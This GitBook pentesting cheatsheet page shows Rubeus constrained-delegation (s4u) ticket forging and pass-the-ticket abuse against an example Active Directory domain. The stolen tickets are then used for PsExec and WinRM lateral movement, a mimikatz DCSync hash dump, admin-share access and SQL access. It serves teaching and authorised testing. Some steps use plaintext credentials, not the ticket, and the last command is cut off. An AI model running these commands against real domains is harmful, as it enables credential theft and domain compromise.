Pentesting and Red Teaming Notes
  • 🖥️Pentesting and Red Teaming Cheatsheet
  • Web Application Pentesting(BlackBox)
    • SQL Injection
    • Blind SQL Injection
    • Path Traversal
    • Attacking Authentication
    • Race Conditions
    • Business Logic Vulnerabilities
    • Command Injections
    • Information disclosure
    • Access Controls
    • File upload Attacks
    • XXE
    • Server Side Request Forgery
    • Api Testing
    • noSQL
    • DOM based vulnerabilities
    • Cross Site scripting
  • Infrastructure Pentesting
    • Windows Privilege Escalation
    • Attacking Active Directory
    • File Transfers and Download
    • Pivoting(Tunneling and Port Forwarding)
    • Linux Privilege Escalation
    • Stealing NTLM hashes
    • Tricks and Tips
  • Active Directory Pentesting
    • powershell theory
    • Methodology
    • domain enumeration
    • File Transfer
    • PowerShell ADModule
    • Local Privilege Escalation
    • PowerView Commands
    • ACLs Descriptions
    • ACLs Abuse
    • ACL
    • Trusts
    • User Hunting
    • group policy
    • Mimikatz
    • BloodHound
    • LateralMovement
    • Kerberoasting
    • defense bypasses
    • Set-SPN
    • ASREProasting
    • Unconstrained Delegation
    • Constrained Delegation
    • Resource Based Constrained Delegation
    • AD CS
    • Persistance
    • Priv Esc Trusts Inside Forest
    • MSSQL Servers
    • Priv Esc Trusts Across Forest
    • Tips And Tricks
    • Service Tickets and Abuses
  • Reconnaissance
    • Web Application Reconnaissance
    • External Reconnaissance
Powered by GitBook
On this page
  1. Active Directory Pentesting

Service Tickets and Abuses

1. Service Ticket for HOST (Lateral Movement with PsExec, wmi, winrm)

The HOST service ticket can be used for lateral movement by accessing remote services like PsExec. PsExec allows you to run commands on remote systems.

Steps:

  • Obtain the HOST service ticket:

    C:\Users\Alex> .\Rubeus.exe s4u /impersonateuser:alex /msdsspn:cifs/dc.dev.dhitalcorp.local /altservice:host /user:sql-1$ /ticket:<base64TGT> /nowrap

  • Save the service ticket to a file:

    C:\Users\Alex> echo <base64ServiceTicket> > C:\Users\Alex\Desktop\ticket.kirbi

  • Inject the ticket using Rubeus:

    C:\Users\Alex> .\Rubeus.exe ptt /ticket:C:\Users\Alex\Desktop\ticket.kirbi

  • Use PsExec to run commands on the target system:

    C:\Users\Alex> psexec.exe \\dc.dev.dhitalcorp.local cmd

  • Access WinRM:

    C:\Users\Alex> Enter-PSSession -ComputerName dc.dev.dhitalcorp.local -Credential (New-Object System.Management.Automation.PSCredential('dev\alex', (ConvertTo-SecureString "password" -AsPlainText -Force)))

  • Access WMI:

    C:\Users\Alex> Get-WmiObject -Class Win32_OperatingSystem -ComputerName dc.dev.dhitalcorp.local -Credential (New-Object System.Management.Automation.PSCredential('dev\alex', (ConvertTo-SecureString "password" -AsPlainText -Force)))

2. Service Ticket for LDAP (DC Sync Attack)

The LDAP service ticket can be used for Directory Replication Service (DC Sync) attacks. This allows you to replicate password hashes from a Domain Controller.

Steps:

  • Obtain the LDAP service ticket:

    C:\Users\Alex> .\Rubeus.exe s4u /impersonateuser:alex /msdsspn:cifs/dc.dev.dhitalcorp.local /altservice:ldap /user:sql-1$ /ticket:<base64TGT> /nowrap

  • Save the service ticket to a file:

    C:\Users\Alex> echo <base64ServiceTicket> > C:\Users\Alex\Desktop\ticket.kirbi

  • Inject the ticket using Rubeus:

    C:\Users\Alex> .\Rubeus.exe ptt /ticket:C:\Users\Alex\Desktop\ticket.kirbi

  • Perform the DC Sync attack using mimikatz:

    C:\Users\Alex> mimikatz.exe
mimikatz # lsadump::dcsync /user:dc$

3. Service Ticket for CIFS (File Share Access)

The CIFS service ticket allows you to access file shares on a remote system, enabling you to read, write, or modify files on the target.

Steps:

  • Obtain the CIFS service ticket:

    C:\Users\Alex> .\Rubeus.exe s4u /impersonateuser:alex /msdsspn:cifs/dc.dev.dhitalcorp.local /user:sql-1$ /ticket:<base64TGT> /nowrap

  • Save the service ticket to a file:

    C:\Users\Alex> echo <base64ServiceTicket> > C:\Users\Alex\Desktop\ticket.kirbi

  • Inject the ticket using Rubeus:

    C:\Users\Alex> .\Rubeus.exe ptt /ticket:C:\Users\Alex\Desktop\ticket.kirbi

  • Access the file share:

    C:\Users\Alex> net use \\dc.dev.dhitalcorp.local\c$

4. Service Ticket for MSSQLSvc (SQL Server Access)

The MSSQLSvc service ticket can be used to access SQL Server instances, allowing you to run queries and potentially extract data.

Steps:

  • Obtain the MSSQLSvc service ticket:

    C:\Users\Alex> .\Rubeus.exe s4u /impersonateuser:alex /msdsspn:cifs/dc.dev.dhitalcorp.local /altservice:mssqlsvc /user:sql-1$ /ticket:<base64TGT> /nowrap

  • Save the service ticket to a file:

    C:\Users\Alex> echo <base64ServiceTicket> > C:\Users\Alex\Desktop\ticket.kirbi

  • Inject the ticket using Rubeus:

    C:\Users\Alex> .\Rubeus.exe ptt /ticket:C:\Users\Alex\Desktop\ticket.kirbi

  • Access the SQL Server:

    C:\Users\Alex> sqlcmd -S dc.dev.dhitalcorp.local -d master -U alex -P <password>

5. Service Ticket for HTTP (Web Service Access)

The HTTP service ticket can be used to access web applications running on the target system, allowing for interactions with the web services as the impersonated user.

Steps:

  • Obtain the HTTP service ticket:

    C:\Users\Alex> .\Rubeus.exe s4u /impersonateuser:alex /msdsspn:cifs/dc.dev.dhitalcorp.local /altservice:http /user:sql-1$ /ticket:<base64TGT> /nowrap

  • Save the service ticket to a file:

    C:\Users\Alex> echo <base64ServiceTicket> > C:\Users\Alex\Desktop\ticket.kirbi

  • Inject the ticket using Rubeus:

    C:\Users\Alex> .\Rubeus.exe ptt /ticket:C:\Users\Alex\Desktop\ticket.kirbi

  • Access the web application:

    You can use tools like curl or a browser to access the web service:

    C:\Users\Alex> curl -H "Authorization: Negotiate <base64ServiceTicket>" http://dc.dev.dhi
PreviousTips And TricksNextWeb Application Reconnaissance

Last updated 8 months ago